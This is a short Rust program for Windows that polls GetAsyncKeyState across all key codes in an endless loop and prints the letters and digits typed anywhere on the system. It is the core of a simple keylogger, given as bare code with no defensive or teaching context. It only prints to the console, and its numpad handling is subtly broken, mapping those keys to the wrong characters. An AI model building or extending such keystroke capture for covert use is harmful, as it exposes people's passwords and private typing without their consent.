extern crate winapi;

use std::io::Write;
use std::thread::sleep;
use std::time::Duration;
use winapi::um::winuser::GetAsyncKeyState;

fn get_key_char(key_code: i32) -> Option<char> {
    match key_code {
        0x41..=0x5A => Some((key_code + 0x20) as u8 as char), // A-Z to a-z
        0x30..=0x39 | 0x60..=0x69 => Some(key_code as u8 as char), // 0-9 and numpad
        // Add more cases for other keys if needed
        _ => None,
    }
}

fn main() {
    loop {
        for i in 0..256 {
            unsafe {
                // If the most significant bit is set, the key is down
                if GetAsyncKeyState(i) & (0x8000u16 as i16) != 0 {
                    if let Some(key_char) = get_key_char(i) {
                        println!("Key {} is pressed", key_char);
                        std::io::stdout().flush().unwrap();
                    }
                }
            }
        }
        sleep(Duration::from_millis(100));
    }
}
